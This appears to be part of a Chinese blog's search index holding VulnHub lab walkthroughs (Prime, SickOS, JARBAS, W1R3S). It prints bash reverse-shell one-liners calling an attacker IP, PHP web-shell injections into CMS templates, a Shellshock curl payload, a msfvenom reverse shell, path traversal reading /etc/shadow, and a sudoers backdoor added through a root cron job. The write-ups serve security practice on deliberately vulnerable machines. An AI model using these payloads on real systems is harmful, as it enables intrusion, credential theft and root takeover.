class="headerlink" title="/index.php"></a>/index.php</h4><p><img src="/2023/03/17/Prime/image-20230315155244206.png" alt=" "></p><p>获得参数file</p><p>访问file</p><p><img src="/2023/03/17/Prime/image-20230315160546053.png" alt="image-20230315160546053"></p><p>提示参数的内容不正确,尝试前面提示的location.txt文件</p><p><img src="/2023/03/17/Prime/image-20230315161439318.png" alt="image-20230315161439318"></p><p>出现另一个参数<code>secrettier360</code></p><p><img src="/2023/03/17/Prime/image-20230315161822628.png" alt="image-20230315161822628"></p><p>该参数是image.php上的参数,这里应该是一个本地文件包含漏洞</p><h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><p><code>curl http://192.168.37.138/image.php?secrettier360=../../../../../../etc/passwd</code></p><p><img src="http://42.193.172.120:8088/images/2023/03/21/image-20230321144624395.png" alt="image-20230321144624395"></p><p>根据提示查看password.txt文件</p><p><code>curl http://192.168.37.138/image.php?secrettier360=../../../../../../home/saket/password.txt</code></p><p><img src="/2023/03/17/Prime/image-20230322185944244.png" alt="image-20230322185944244"></p><p>拿到一个密码 follow_the_ippsec,尝试ssh连接,均失败。</p><h2 id="Wordpress"><a href="#Wordpress" class="headerlink" title="Wordpress"></a>Wordpress</h2><blockquote><p><strong>WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。</strong></p></blockquote><p><code>wpscan --url http://192.168.37.138/wordpress -e u</code></p><p>已知一个密码,此时思路是-e参数枚举wordpress后台用户名,获得用户名victor</p><p><img src="/2023/03/17/Prime/image-20230322194728822.png" alt="image-20230322194728822"></p><p>成功登陆</p><p><img src="/2023/03/17/Prime/image-20230322195639260.png" alt="image-20230322195639260"></p><p>登陆wordpress后台后,通常的思路是查看Plugins是否允许插入插件orAppearance/Theme Editor处是否有可写权限的脚本文件</p><p>创建一个zip文件尝试上传,此路不通</p><p><img src="/2023/03/17/Prime/image-20230322201902573.png" alt="image-20230322201902573"></p><p>在Theme Editor发现可修改secret.php文件,写入一句话木马反弹shell</p><p><img src="/2023/03/17/Prime/image-20230322202228133.png" alt="image-20230322202228133"></p><p><code><?php "/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.135/7777 0>&1' "?></code></p><p><img src="/2023/03/17/Prime/image-20230322202729914.png" alt="image-20230322202729914"></p><p>接下来就是寻找secret.php文件的路径</p><blockquote><p>WordPress主题存放在 “wp-content/themes/” 这个文件夹中,我们可以看到各自默认有几个主题文件夹,里面包含了所有的主题目录,并存储为一个目录。每个目录名称通常是一个主题名称。如果我们有需要添加新主题可以将主题的文件夹传到这个目录,然后在后台的外观主题可以激活设置当前主题。</p></blockquote><p>/wp-content/themes/twentynineteen/secret.php </p><p><img src="/2023/03/17/Prime/image-20230322203406131.png" alt="image-20230322203406131"></p><p>得到反弹shell</p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p><img src="/2023/03/17/Prime/image-20230322203854460.png" alt="image-20230322203854460"></p><p>提示了/home/saket/目录</p><p>user.txt中存放密文,用md5解密无果,enc是一个可执行文件,执行时需要输入密码</p><p><img src="/2023/03/17/Prime/image-20230322213605210.png" alt="image-20230322213605210"></p><p>此处我们可以通过find命令搜索backup文件 (backup文件会有一些关键信息)</p><p><code>find / -name '*backup*' 2>/dev/null | sort | less</code></p><blockquote><p>忽略错误输出 使用“2>/dev/null”将错误信息输出到“/dev/null”设备中,从而忽略错误输出。</p><p>在Linux系统中,每个进程都有三个标准文件描述符:标准输入(stdin)、标准输出(stdout)和标准错误(stderr)。这些文件描述符分别对应于文件描述符0、1和2。</p><p>当我们使用Linux命令时,它们通常会将标准输出和标准错误分别输出到终端,以便我们可以看到它们的输出结果。但是,有时候我们可能不希望看到标准错误的输出信息,可以通过将标准错误输出重定向到“/dev/null”设备中,从而将其忽略掉。</p><p>在命令中,“2”代表标准错误的文件描述符,”>”代表重定向操作符,”/dev/null”代表一个特殊的设备文件,用于将所有数据丢弃而不保存。</p><p>因此,使用“2>/dev/null”将错误信息输出到“/dev/null”设备中的意思是将标准错误输出重定向到“/dev/null”设备中,从而将其忽略掉。</p></blockquote><p>找到opt/backup/server_database/backup_pass<img src="/2023/03/17/Prime/image-20230322214027888.png" alt="image-20230322214027888"></p><p>获得 密码:<strong>backup_password</strong></p><p>成功运行enc文件生成密钥密文文件</p><p><img src="/2023/03/17/Prime/image-20230322214218148.png" alt="image-20230322214218148"></p><p><img src="/2023/03/17/Prime/image-20230322214602948.png" alt="image-20230322214602948"></p><p>提示用md5加密ippsec作为密码解密enc.txt</p><p><img src="/2023/03/17/Prime/image-20230322214548296.png" alt="image-20230322214548296"></p><p><strong>366a74cb3c959de17d61db30591c39d1</strong></p><p>此处也可以用echo与md5sum进行md5加密——但要注意需要-n来取消字符串的换行符,否则加密会有误</p><p><img src="/2023/03/17/Prime/image-20230328010851938.png" alt="image-20230328010851938"></p><p>利用openssl解密</p><p><img src="/2023/03/17/Prime/image-20230328201505755.png" alt="image-20230328201505755"></p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in $(cat txt);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -K '33363661373463623363393539646531376436316462333035393163333964310a' -$i 2>/dev/null; echo $i; done</span><br></pre></td></tr></table></figure><p><img src="/2023/03/17/Prime/image-20230328203725787.png" alt="image-20230328203725787"></p><p>最后解密的saket用户的密码为tribute_to_ippsec</p><p>切换账户并查看权限<img src="/2023/03/17/Prime/Users\ljx\AppData\Roaming\Typora\typora-user-images\image-20230322215242922.png" alt="image-20230322215242922"></p><p>执行提示的文件 /home/victor/undefeated_victor<img src="/2023/03/17/Prime/image-20230322215223805.png" alt="image-20230322215223805"></p><p>提示没找到challenge文件,尝试创建challenge文件并写入“/bin/bash”</p><p><img src="/2023/03/17/Prime/image-20230322215551337.png" alt="image-20230322215551337"></p><p>成功获得root权限</p><p><img src="/2023/03/17/Prime/image-20230322215633795.png" alt="image-20230322215633795"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>SickOS</title>
<link href="/2023/03/15/SickOS/"/>
<url>/2023/03/15/SickOS/</url>
<content type="html"><![CDATA[<h3 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ABOUT RELEASE</span><br><span class="line">Name........: SickOs1.1</span><br><span class="line">Date Release: 11 Dec 2015</span><br><span class="line">Author......: D4rk</span><br><span class="line">Series......: SickOs</span><br><span class="line">Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt</span><br><span class="line">Tester(s)...: h1tch1</span><br><span class="line">Twitter.....: https://twitter.com/D4rk36</span><br></pre></td></tr></table></figure><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><h4 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h4><p>IP地址 192.168.37.140</p><img src="/2023/03/15/SickOS/image-20230312222911204.png" alt="image-20230312222911204" style="zoom: 67%;"><h4 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h4><p><img src="/2023/03/15/SickOS/image-20230312224029714.png" alt="image-20230312224029714"></p><p><img src="/2023/03/15/SickOS/image-20230312224236606.png" alt="image-20230312224236606"></p><p>发现端口22 3128 8080</p><p>其中8080端口未开启</p><p>经过两次nmap漏洞扫描并未发现其他信息</p><p><img src="/2023/03/15/SickOS/image-20230312224524062.png" alt="image-20230312224524062"></p><p>访问3128端口与8080端口结果如下</p><img src="/2023/03/15/SickOS/image-20230312225858677.png" alt="image-20230312225858677" style="zoom:67%;"><img src="/2023/03/15/SickOS/image-20230312225908889.png" alt="image-20230312225908889" style="zoom:67%;"><p>结果都显示3128端口的服务框架为squid,上网搜寻squid的相关信息</p><blockquote><p><a href="https://www.open-open.com/misc/goto?guid=4958185427613467036">Squid cache</a>(简称为Squid)是一个流行的自由软件(GNU通用公共许可证)的代理服务器和Web缓存服务器。Squid有广泛的用途,从作为网页服务器的前置cache服务器缓存相关请求来提高Web服务器的速度,到为一组人共享网络资源而缓存万维网,域名系统和其他网络搜索,到通过过滤流量帮助网络 安全,到局域网通过DL上网。Squid主要设计用于在Unix一类系统运行。</p></blockquote><p>在此猜测,访问80端口须走3128端口代理</p><h3 id="Squid代理设置"><a href="#Squid代理设置" class="headerlink" title="Squid代理设置"></a>Squid代理设置</h3><p>通过这个思路 我们可以对靶机进行目录爆破 在爆破的同时加入代理服务器</p><img src="/2023/03/15/SickOS/image-20230313003151041.png" alt="image-20230313003151041" style="zoom:67%;"><p>通过浏览器访问前设置proxy代理</p><img src="/2023/03/15/SickOS/image-20230313003529361.png" alt="image-20230313003529361" style="zoom:50%;"><h3 id="Web服务"><a href="#Web服务" class="headerlink" title="Web服务"></a>Web服务</h3><p>访问robots.txt</p><p><img src="/2023/03/15/SickOS/image-20230313003627827.png" alt="image-20230313003627827"></p><p>访问/wolfcms目录</p><img src="/2023/03/15/SickOS/image-20230313003729450.png" alt="image-20230313003729450" style="zoom:67%;"><p>通过谷歌关键词搜索后台登陆地址</p><p><img src="/2023/03/15/SickOS/image-20230313011138489.png" alt="image-20230313011138489"></p><p>成功访问后台登陆地址,是一个登陆界面。面对该登陆界面有以下三种思路</p><ul><li>1.弱密码</li><li>2.默认账号</li><li>3.暴力破解</li></ul><p><img src="/2023/03/15/SickOS/image-20230313011207583.png" alt="image-20230313011207583"></p><p>经过弱密码尝试后,用 <code>admin/admin</code>成功登陆</p><p><img src="/2023/03/15/SickOS/image-20230314003826611.png" alt="image-20230314003826611"></p><p>发现有很多文件内容都是用php脚本来执行,同时也存在文件上传的入口</p><p><img src="/2023/03/15/SickOS/image-20230314003944203.png" alt="image-20230314003944203"></p><p><img src="/2023/03/15/SickOS/image-20230314004000255.png" alt="image-20230314004000255"></p><p>尝试在Articles中插入一句话木马。</p><p><code><?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.135/7777 0>&1'");?></code></p><p>在点击Articles时成功反弹shell</p><p><img src="/2023/03/15/SickOS/image-20230314004524690.png" alt="image-20230314004524690"></p><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>查看网站配置文件config.php</p><p><img src="/2023/03/15/SickOS/image-20230314005652091.png" alt="image-20230314005652091"></p><p>获得数据库账号密码 <code>root/john@123</code></p><p>查看/etc/passwd文件,获得靶机的相关用户及其权限</p><p><img src="/2023/03/15/SickOS/image-20230314103710896.png" alt="image-20230314103710896"></p><p>尝试用着数据库的账号密码 对靶机ssh连接</p><p><img src="/2023/03/15/SickOS/image-20230314103909232.png" alt="image-20230314103909232"></p><p>成功ssh连接获得sickos账户</p><p><img src="/2023/03/15/SickOS/image-20230314103954962.png" alt="image-20230314103954962"></p><p><img src="/2023/03/15/SickOS/image-20230314105247196.png" alt="image-20230314105247196"></p><h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>利用Nikto 发现shellshock漏洞</p><p><a href="https://blog.csdn.net/smli_ng/article/details/105994754">Nikto详细使用教程</a></p><blockquote><p><strong>nikto常用命令</strong><br>-upodate 升级,更新插件</p><p>-host 扫描目标URl</p><p>-id username:password http认证接口</p><p>-list-plugins 列出所有可用的插件</p><p>-evasion IDS/IPS逃避技术(实例演示里有详细信息)</p><p>-port 指定端口(默认80)</p><p> -ssl 使用SSL</p><p>-useproxy 使用http代理</p><p>-vhost 域名 当一个IP拥有多个网站时 使用</p><p><strong>nikto交互参数(扫描过程中使用)</strong><br>空格 报告当前扫描状态</p><p>v 显示详细信息</p><p>d 显示调试信息</p><p>e 显示http错误信息</p><p>p 显示扫描进度</p><p>r 显示重定向信息</p><p>c 显示cookie</p><p>a 显示身份认证过程</p><p>q 退出程序</p><p>N 扫描下一个目标</p><p>P 暂停扫描</p></blockquote><p><code>nikto -h 192.168.37.140 -useproxy 192.168.37.140:3128</code> 注意此处需要挂代理</p><p><img src="/2023/03/15/SickOS/image-20230314235545518.png" alt="image-20230314235545518"></p><blockquote><p><strong>漏洞原因</strong></p><p>bash使用的环境变量是通过函数名称来调用的,以”<code>(){</code>“开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “<code>}</code>” 为结束,而是执行其后的恶意shell命令</p></blockquote><p><strong>检查漏洞</strong></p><p><code>curl --proxy http://192.168.37.140:3128 -v -A "() { :;};echo;/usr/bin/whoami" http://192.168.37.140/cgi-bin/status</code></p><p><img src="/2023/03/15/SickOS/image-20230315000417335.png" alt="image-20230315000417335"></p><p><strong>反弹shell</strong></p><p><code>curl --proxy http://192.168.37.140:3128 -v -A "() { :; }; /bin/bash -i >& /dev/tcp/192.168.37.135/7777 0>&1" http://192.168.37.140//cgi-bin/status</code></p><blockquote><p>小tips</p><p>当获得的shell的交互性比较差可以用使用 python 的 pty 来转换为 交互式shell</p><p><code>python3 -c 'import pty; pty.spawn("/bin/bash")'</code></p></blockquote><p><strong>查看网站根目录文件</strong></p><p><img src="/2023/03/15/SickOS/image-20230315002609547.png" alt="image-20230315002609547"></p><p>通过查看定时任务cron提权 </p><p><img src="/2023/03/15/SickOS/image-20230315003441880.png" alt="image-20230315003441880"></p><p>在过滤关键字cron中获得多个定时任务有关的文件夹,其中在cron.d中的automate中发现存在一个定时任务每个一分钟执行网站根目录下的python文件,因此可以通过执行python脚本来反弹shell,进一步提权</p><p>使用msfvenom生成shell</p><p><a href="https://blog.51cto.com/yyxianren/5720367">msfvenom参数简介</a> <a href="https://blog.csdn.net/m0_64444909/article/details/126841128">利用msfvenom制作木马,并且反弹shell</a></p><p><code>msfvenom -p cmd/unix/reverse_python LHOST=192.168.37.135 LPORT=7778 -f raw</code></p><p><img src="/2023/03/15/SickOS/image-20230315004656083.png" alt="image-20230315004656083"></p><p><img src="/2023/03/15/SickOS/image-20230315004806042.png" alt="image-20230315004806042"></p><p>成功获得目标!!!</p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>JARBAS</title>
<link href="/2023/03/11/JARBAS/"/>
<url>/2023/03/11/JARBAS/</url>
<content type="html"><![CDATA[<h2 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="靶场介绍"></a>靶场介绍</h2><p>靶机名:JARBAS</p><p>Jarbas靶场下载地址: <a href="https://download.vulnhub.com/jarbas/Jarbas.zip">https://download.vulnhub.com/jarbas/Jarbas.zip</a></p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p>靶机IP地址 192.168.37.139</p><p><img src="/2023/03/11/JARBAS/image-20230309210231914.png" alt="image-20230309210231914"></p><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p><code>nmap --min-rate 10000 -p- 192.168.37.139</code></p><p>两次扫描有不同的结果 因此我们尽量在扫描时重复一次 防止端口漏扫</p><p><img src="/2023/03/11/JARBAS/image-20230309222737897.png" alt="image-20230309222737897"></p><p>查询端口服务对应的版本</p><p><code>nmap -sT -sV -O -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223124729.png" alt="image-20230309223124729"></p><p><code>nmap -sU -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223208609.png" alt="image-20230309223208609"></p><p>nmap漏洞扫描</p><p><code>nmap --script=vuln -p22,80,3306,8080 192.168.37.139</code></p><p><img src="/2023/03/11/JARBAS/image-20230309223711562.png" alt="image-20230309223711562"></p><p>在80端口中发现潜在的目录列表 /icons</p><p>在8080端口中发现/robots.txt文件</p><p>访问80端口web服务</p><p><img src="/2023/03/11/JARBAS/image-20230310004017066.png" alt="image-20230310004017066"></p><p>访问8080端口</p><p><img src="/2023/03/11/JARBAS/image-20230310003928522.png" alt="image-20230310003928522"></p><p>疑似后台登陆账密</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p><code>dirsearch -u 192.168.37.139 -x 403</code></p><p><img src="/2023/03/11/JARBAS/image-20230310001619389.png" alt="image-20230310001619389"></p><p>访问access.html</p><p><img src="/2023/03/11/JARBAS/image-20230310003639361.png" alt="image-20230310003639361"></p><p>一眼md5加密 解密得到</p><p><img src="/2023/03/11/JARBAS/image-20230310003705540.png" alt="image-20230310003705540"></p><p>对应的数据如下</p><table><thead><tr><th>user</th><th>passwd</th></tr></thead><tbody><tr><td>tiago</td><td>italia99</td></tr><tr><td>trindade</td><td>vipsu</td></tr><tr><td>eder</td><td>marianna</td></tr></tbody></table><p>用于8080端口登陆,在经过上述对应账密登陆失败后,通过打乱搭配尝试登陆</p><p>最终eder vipsu 登陆 (此处由于数据内容较少没有bp,当数据过多时则需要用bp快速找出正确账号密码)</p><h2 id="Getshell"><a href="#Getshell" class="headerlink" title="Getshell"></a>Getshell</h2><p><img src="/2023/03/11/JARBAS/image-20230310110850713.png" alt="image-20230310110850713"></p><p>在New Item处可以创建一个新项目 尝试创建一个名为test1的项目,在设置项目时看到Build选项中存在<code>Execute shell</code> 此处我们可以通过bash getshell</p><p><img src="/2023/03/11/JARBAS/image-20230310111518081.png" alt="image-20230310111518081"></p><p>getshell语句为:<code>/bin/bash -i >& /dev/tcp/192.168.37.135/7777 0>&1 </code></p><table><thead><tr><th>命令</th><th>命令详解</th></tr></thead><tbody><tr><td>bash -i</td><td>产生一个bash交互环境。</td></tr><tr><td>>&</td><td>将联合符号前面的内容与后面相结合,然后一起重定向给后者。</td></tr><tr><td>/dev/tcp/192.168.37.135/7777</td><td>Linux环境中所有的内容都是以文件的形式存在的,其实大家一看见这个内容就能明白,就是让目标主机与攻击机192.168.37.135的7777端口建立一个tcp连接。</td></tr><tr><td>0>&1</td><td>将标准输入与标准输出的内容相结合,然后重定向给前面标准输出的内容。</td></tr></tbody></table><p>Bash反弹一句完整的解读过程就是:</p><blockquote><p>Bash产生了一个交互环境和本地主机主动发起与攻击机7777端口建立的连接(即TCP 7777会话连接)相结合,然后在重定向个TCP 7777会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个Bash反弹环境。</p></blockquote><p>攻击机本地监听7777端口 成功连接</p><p><img src="/2023/03/11/JARBAS/image-20230310113033089.png" alt="image-20230310113033089"></p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>查询shell的权限</p><p><code>sudo -l</code></p><p><img src="/2023/03/11/JARBAS/image-20230310230354149.png" alt="image-20230310230354149"></p><p>无任何权限,需要提权</p><p>查询定时任务</p><blockquote><p>定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 <code>/etc/crontab</code> 文件和 <code>/etc/cron.*/</code> 目录。它同样也会检查 /var/spool/cron/ 目录。</p></blockquote><p><img src="/2023/03/11/JARBAS/image-20230310232437353.png" alt="image-20230310232437353"></p><p>存在一个定时任务</p><p>任务解释:每5分钟以root权限执行/etc/script/CleaningScript.sh ,执行的结果将被丢弃</p><p>脚本内容如下 </p><p><img src="/2023/03/11/JARBAS/image-20230310232715965.png" alt="image-20230310232715965"></p><p>方法一</p><p>将getshell payload 写入/etc/script/CleaningScript.sh 同时监听7776端口待执行后可以获得root权限</p><p><img src="/2023/03/11/JARBAS/image-20230310233421961.png" alt="image-20230310233421961"></p><p><img src="/2023/03/11/JARBAS/image-20230310233705929.png" alt="image-20230310233705929"></p><p>方法二</p><p>修改CleaningScript.sh内容,使它能够修改sudoers,给予jenkins免密码执行sudo的权限。并利用crontab定时执行该任务<br><code>echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh</code></p><p>sudoers用来保存一些用户,使这些用户可以通过sudo命令来暂时获取root的权限</p><p>成功获得root权限</p><p><img src="/2023/03/11/JARBAS/image-20230310233734120.png" alt="image-20230310233734120"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
<entry>
<title>W1R3S</title>
<link href="/2023/03/10/W1R3S/"/>
<url>/2023/03/10/W1R3S/</url>
<content type="html"><![CDATA[<h3 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="靶场介绍"></a>靶场介绍</h3><p>靶机名:W1R3S</p><p>靶机地址:<a href="https://www.vulnhub.com/entry/w1r3s-101,220/">https://www.vulnhub.com/entry/w1r3s-101,220/</a></p><p>下载地址:<strong>下载(镜像)</strong>:<a href="https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip">https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip</a></p><p>描述:你被雇来对W1R3S做渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。</p><p>目标:得到root权限&找到flag.txt</p><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>1.主机发现</p><p>开启靶机后用nmap扫描发现靶机ip</p><p><code>sudo nmap -sn 192.168.37.0/24</code> (不知道具体ip可以通过关闭靶机前后分别扫描)</p><p>ip地址为 <code>192.168.37.137</code></p><p><img src="/2023/03/10/W1R3S/image-20230418123529176.png" alt="image-20230418123529176"></p><p>2.端口扫描</p><p><code>sudo nmap --min-rate 10000 -p- 192.168.37.137</code> 设置–min-rate参数确保扫得全and准确</p><p><img src="/2023/03/10/W1R3S/image-20230418123538301.png" alt="image-20230418123538301"></p><p>识别端口相关信息</p><p><code>sudo nmap -sT -sV -O -p21,22,80,3306 192.168.37.137</code> -sT用TCP协议 -sV获得对应服务的版本信息 -O获得主机信息</p><p><img src="/2023/03/10/W1R3S/image-20230418123547253.png" alt="image-20230418123547253"></p><p><code>sudo nmap -sU -p21,22,80,3306 192.168.37.137</code> -sU用udp协议 (往往开发人员忽略了UDP协议)</p><p><img src="/2023/03/10/W1R3S/image-20230418123629804.png" alt="image-20230418123629804"></p><p>4个端口侧重点:80>21>3306>22</p><p>其中ssh服务 一般是通过暴力破解password 所以为最不可能一项</p><p><code>sudo nmap --script=vuln -p21,22,80,3306 192.168.37.137</code></p><p>利用nmap自带的漏洞扫描对端口进行扫描</p><p><img src="/2023/03/10/W1R3S/image-20230418123645392.png" alt="image-20230418123645392"></p><p>从结果得知21 22端口没有信息 80端口中web服务框架为wordpress 是重点突破的地方</p><p>MAC地址显示VMware 如果是在真实环境中获得的,宿主环境很可能是window系统</p><h3 id="ftp"><a href="#ftp" class="headerlink" title="ftp"></a>ftp</h3><h4 id="测试ftp是否允许匿名登陆"><a href="#测试ftp是否允许匿名登陆" class="headerlink" title="测试ftp是否允许匿名登陆"></a>测试ftp是否允许匿名登陆</h4><p><a href="https://www.bilibili.com/read/cv10444306?from=search">FTP(匿名登录)未授权访问漏洞</a></p><p>FTP的匿名登录一般有三种:<br>1、 用户名:anonymous 密码:Email或者为空<br>2、 用户名:FTP 密码:FTP或者为空<br>3、 用户名:USER 密码:pass</p><p><img src="/2023/03/10/W1R3S/image-20230418123751298.png" alt="image-20230418123751298"></p><p>成功匿名登陆</p><p><strong>注!!! ftp登陆后 需要输入binary切换一下</strong> </p><p>原因ftp 默认为ascii获取文件内容,当获取的文件为可执行文件时,不输入binary则可能会损坏可执行文件</p><p><strong>ftp文件下载命令 wget +文件名</strong></p><p><img src="/2023/03/10/W1R3S/image-20230418123806603.png" alt="image-20230418123806603"></p><p>其中 employee-names.txt涉及一些敏感信息泄露 可能对于后续有用</p><p><img src="/2023/03/10/W1R3S/image-20230307004844476.png" alt="image-20230307004844476"></p><h3 id="Web服务"><a href="#Web服务" class="headerlink" title="Web服务"></a>Web服务</h3><h4 id="访问页面"><a href="#访问页面" class="headerlink" title="访问页面"></a>访问页面</h4><p><img src="/2023/03/10/W1R3S/image-20230307103605194.png" alt="image-20230307103605194"></p><p>前面得知它是一个wordpress框架,通过目录爆破获得对应框架的路径</p><h4 id="目录爆破"><a href="#目录爆破" class="headerlink" title="目录爆破"></a>目录爆破</h4><p>利用feroxbuster及kali自带字典进行爆破 路径:<code>/usr/share/seclists/</code></p><p><a href="https://blog.csdn.net/Jiajiajiang_/article/details/88638367">kali系统自带字典wordlists简介</a></p><p><code>feroxbuster -u http://192.168.37.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt</code></p><p>扫描结果</p><p><img src="/2023/03/10/W1R3S/image-20230308004531661.png" alt="image-20230308004531661"></p><p>其中wordpress 与 administrator目录</p><h4 id="Cuppa-CMS"><a href="#Cuppa-CMS" class="headerlink" title="Cuppa CMS"></a>Cuppa CMS</h4><p>先访问<a href="http://192.168.37.137/administrator">http://192.168.37.137/administrator</a> 获得一个CMS安装界面</p><p><img src="/2023/03/10/W1R3S/image-20230308004759753.png" alt="image-20230308004759753"></p><p>点击next后出现注册信息</p><p><img src="/2023/03/10/W1R3S/image-20230308004837893.png" alt="image-20230308004837893"></p><p>随意填写再次点击next后安装失败 提示没有Administrator权限 此路不通</p><p><img src="/2023/03/10/W1R3S/image-20230308004937654.png" alt="image-20230308004937654"></p><p>用searchsploit搜索cuppa cms相关漏洞</p><p><a href="https://blog.csdn.net/qq_63844103/article/details/128405733">【网安神器篇】——searchsploit漏洞利用搜索工具</a> </p><p>查询到相关漏洞描述文件 并用-m参数将一个漏洞利用镜像(副本)到当前工作目录(后面跟漏洞ID号) </p><p><img src="/2023/03/10/W1R3S/image-20230308110519802.png" alt="image-20230308110519802"></p><p><img src="/2023/03/10/W1R3S/image-20230308231808038.png" alt="image-20230308231808038"></p><p>get传参访问 没有结果 </p><img src="/2023/03/10/W1R3S/image-20230308231847812.png" alt="image-20230308231847812" style="zoom:50%;"><p>由于$_REQUEST可以用post传参 所以用curl尝试post传参</p><p><code>curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.37.137/administrator/alerts/alertConfigField.php</code></p><p>成功获得/etc/passwd内容 <a href="http://c.biancheng.net/view/839.html">Linux /etc/passwd内容解释</a></p><img src="/2023/03/10/W1R3S/image-20230308232053571.png" alt="image-20230308232053571" style="zoom:67%;"><p>尝试查看/etc/shadow文件 <a href="http://c.biancheng.net/view/839.html">Linux /etc/shadow(影子文件)内容解析(超详细)</a></p><p><code>curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.37.137/administrator/alerts/alertConfigField.php</code></p><p><img src="/2023/03/10/W1R3S/image-20230308233232927.png" alt="image-20230308233232927"></p><p>将/etc/shadow中三个较长的信息收集在一个txt文件内 用john破解</p><p><img src="/2023/03/10/W1R3S/image-20230308234943255.png"></p><p>获得其中两个用户的账号密码,很明显可以看出w1r3s权限更高些</p><p>利用账号密码ssh远程登陆</p><p><img src="/2023/03/10/W1R3S/image-20230309143845639.png" alt="image-20230309143845639"></p><p>成功getshell</p><p>查询权限 <code>sudo -l</code> 显示了允许当前用户使用的命令</p><p><img src="/2023/03/10/W1R3S/image-20230309144316710.png" alt="image-20230309144316710"></p><p>利用sudo提权 <code>sudo /bin/bash</code></p><p><img src="/2023/03/10/W1R3S/image-20230309144822739.png" alt="image-20230309144822739"></p><p>获得flag.txt 结束本次靶机的练习</p><p><img src="/2023/03/10/W1R3S/image-20230309145240649.png" alt="image-20230309145240649"></p>]]></content>
<tags>
<tag> vulnhub靶机 </tag>
</tags>
</entry>
</search>